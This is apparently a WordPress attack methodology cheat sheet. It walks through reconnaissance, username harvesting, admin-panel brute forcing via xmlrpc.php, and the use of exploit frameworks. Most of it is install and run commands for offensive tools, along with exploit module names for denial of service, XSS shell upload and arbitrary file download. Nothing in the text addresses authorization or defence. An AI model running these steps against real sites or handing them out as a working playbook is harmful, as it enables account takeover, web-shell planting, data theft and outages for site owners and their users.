WordPress Methodology:
1) Walk-through tools:
https://github.com/Moham3dRiahi/XAttacker
https://github.com/wpscanteam/wpscan
https://github.com/rastating/wordpress-exploit-framework
https://github.com/espreto/wpsploit
2) Look up the known vulnerabilities for this version at https://wpvulndb.com/
3) Scan directories (wfuzz with dictionaries for WordPress)
4) Collect user names; if the names are unique, check each login for leaked passwords (collect with wpscan / wpucollect)
5) Brute-force the admin panel with the following tools, using the collected users
https://github.com/zendoctor/wpbrute-rpc (brute if there is xmlrpc.php)
https://github.com/RecepGunes01/WordPress-Brute-Force
XAttacker:
echo "http://example.com" >> list.txt
perl XAttacker.pl -l list.txt
wpscan:
git clone https://github.com/wpscanteam/wpscan
cd wpscan/
bundle install && rake install
wpscan --hh  # shows the full help
The script also supports the enumerate function:
wpscan --url https://example.com/ -e
vp Vulnerable plugins
ap All plugins
p Popular plugins
vt Vulnerable themes
at All themes
t Popular themes
tt Timthumbs
cb Config backups
dbe Db exports
u User IDs range. e.g. u1-5
  Range separator to use: '-'
  Value if no argument supplied: 1-10
m Media IDs range. e.g. m1-15
  Note: Permalink setting must be set to "Plain" for those to be detected
  Range separator to use: '-'
  Value if no argument supplied: 1-100
Separator to use between the values: ','
Default: All Plugins, Config Backups
wordpress-exploit-framework:
Contains 288 exploits, 58 checks
Dependencies:
apt-get install build-essential patch ruby-dev zlib1g-dev liblzma-dev libsqlite3-dev -y
Installation:
gem install wpxf
Running:
wpxf
Using exploits:
use auxiliary/dos/load_scripts_dos 
use wp_v4.7.2_csrf_dos
use exploit/xss/reflected/contact_form_plugin_reflected_xss_shell_upload
use auxiliary/file_download/ad_widget_php_file_download 
use exploit/xss/reflected/count_per_day_reflected_xss_shell_upload 
use auxiliary/file_download/cp_image_store_arbitrary_file_download
use exploit/xss/reflected/custom_fields_search_reflected_xss_shell_upload 
use auxiliary/file_download/history_collection_arbitrary_file_download 
use exploit/xss/reflected/custom_search_plugin_reflected_xss_shell_upload 
use
load 
use auxiliary/file_download/simple_download_monitor_file_download 
use exploit/xss/reflected/email_queue_reflected_xss_shell_upload 
use
use exploit/xss/reflected/colorway_reflected_xss_shell_upload
use exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload
To view the settings, enter show options
To set an option, enter the set command, example:
Use the check:
use auxiliary/dos/long_password_dos
show options
set target example.com
set username admin
run
wpsploit:
cd /tmp
git clone https://github.com/espreto/wpsploit
mv wpsploit/modules/auxiliary/ ~/.msf4/modules/
mv wpsploit/modules/exploits/ ~/.msf4/modules/
msfconsole
use wp (pressing Tab twice shows the exploits and checks related to WordPress)
To show the settings, enter show options
To set an option, enter the set command, example:
Use the test:
use exploits/unix/webapp/wp_acf_frontend_display_file_upload.rb
show options
set target example.com
run
wpbrute-rpc:
git clone https://github.com/zendoctor/wpbrute-rpc
cd wpbrute-rpc/
bundle install
ruby ./wpbrute-rpc.rb --url="https://wp.example.com/xmlrpc.php" --user=admin --count=500 --list=./500-worst-passwords.txt
WordPress-Brute-Force:
git clone https://github.com/RecepGunes01/WordPress-Brute-Force
cd WordPress-Brute-Force/
Create the files site.txt, user.txt and password.txt and fill in their contents
python brute-force.py site.txt user.txt password.txt
CybScan:
git clone https://github.com/Cyb3r3x3r/cybscan
cd cybscan/
pip install -r requirements.txt  # install dependencies
python cybscan.py example.com